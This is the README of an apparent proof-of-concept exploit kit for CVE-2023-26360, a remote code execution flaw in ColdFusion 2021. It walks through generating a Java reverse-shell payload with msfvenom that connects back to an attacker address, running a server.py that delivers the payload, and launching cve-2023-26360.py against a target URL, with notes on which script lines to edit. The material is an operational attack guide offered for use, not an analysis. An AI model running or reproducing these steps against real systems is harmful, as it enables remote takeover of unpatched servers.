Exploit for Remote Code Execution in ColdFusion 2021 (CVE-2023-26360)# CVE-2023-26360 - Remote Code Execution on ColdFusion 2021
> Sometimes, the scripts don't work at first attempt. Try a few times to make it work
## How to execute
### Create a payload with msfvenom
```
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
```
### Starting `server.py`
- This server will send the payload to the Coldfusion server after the initial access with `cve.2023-26360.py`, so it need to be initialized first.
```
python3 server.py 8000
```
- The argument `8000` is the port that server will be listening on.
- It's important to notice that the line 12 configure the server ip address, so change it:
```
s.bind(('192.168.56.1',port))
```
### Run `cve-2023-26360.py`
- To run the exploit, execute:
```
python3 cve-2023-26360.py 8000
```
- As in `server.py`, the argument `8000` is the port the server.py will listen on. So, it must be the same on both commands.
- The line 8 on `cve-2023-26360.py` sets the ip address of server.py will listen on. It's necessary to configure it correctly.
- The line 11 on `cve-2023-26360.py` sets the ip address of coldfusion server, so change it:
```
url = "http://192.168.56.102:8500"
```
## Tested on
- ColdFusion 2021 - Windows Server 2019
[4.0K] /data/pocs/efefb33ced37dbc64da9a7092650b1f64e292d77
├── [2.2K] cve-2023-26360.py
├── [1.2K] README.md
└── [ 972] server.py
1 directory, 3 files